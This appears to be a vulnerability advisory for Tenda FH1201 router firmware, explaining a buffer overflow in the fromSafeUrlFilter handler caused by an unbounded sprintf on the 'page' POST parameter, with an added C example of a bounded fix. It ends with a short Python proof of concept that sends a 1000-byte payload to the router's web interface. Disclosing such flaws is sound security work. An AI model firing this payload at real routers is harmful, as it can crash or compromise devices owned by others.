Overview

Affected version

FH1201 V1.0BR_V1.2.0.14

Vulnerability details

The Tenda FH1201 V1.0BR_V1.2.0.14 firmware has a buffer overflow vulnerability in the fromSafeUrlFilter function. The v11 variable receives the page parameter from a POST request and is later passed to the sprintf function. Because the user controls the value of page and sprintf does not limit how many bytes it writes, the statement sprintf(v16, "firewall_urlfilterlist.asp?page=%s", v11); can overflow the destination buffer v16.
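A bounded form of the sprintf call described above, as an added example that is not the firmware's or the vendor's code. The names build_redirect, page_is_valid and REDIRECT_BUF_LEN are hypothetical, the 256-byte size is assumed because the page does not give the size of v16, and treating page as a short decimal page number is also an assumption.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed size: the real size of v16 is not stated on the page. */
#define REDIRECT_BUF_LEN 256

/* Assumption: "page" is a page index, so accept 1 to 5 decimal digits only. */
static int page_is_valid(const char *page)
{
    size_t n, i;
    if (page == NULL) return 0;
    n = strlen(page);
    if (n == 0 || n > 5) return 0;
    for (i = 0; i < n; i++)
        if (!isdigit((unsigned char)page[i])) return 0;
    return 1;
}

/* Bounded replacement for sprintf(v16, "...?page=%s", v11).
 * Returns 0 on success, -1 if the input is rejected or would not fit.
 * On failure, out is left as an empty string. */
int build_redirect(char *out, size_t out_len, const char *page)
{
    int n;
    if (out == NULL || out_len == 0) return -1;
    out[0] = '\0';
    if (!page_is_valid(page)) return -1;
    n = snprintf(out, out_len, "firewall_urlfilterlist.asp?page=%s", page);
    /* snprintf returns the length it wanted to write; >= out_len means truncation. */
    if (n < 0 || (size_t)n >= out_len) { out[0] = '\0'; return -1; }
    return 0;
}

int main(void)
{
    char buf[REDIRECT_BUF_LEN];
    char big[1001];                      /* constructed oversized input */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("page=2    -> %d (%s)\n", build_redirect(buf, sizeof buf, "2"), buf);
    printf("page=a... -> %d\n", build_redirect(buf, sizeof buf, big));
    return 0;
}
```

The length check after snprintf rejects oversized output even if the input validation is later relaxed, so the destination buffer is never written past its end.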


POC

import requests

# Address of the router's web management interface
ip = "192.168.1.1"

url = f'http://{ip}/goform/fromSafeUrlFilter'
# Oversized value for the page parameter
payload = b'a' * 1000
data = {
    'page': payload
}

requests.post(url, data=data)
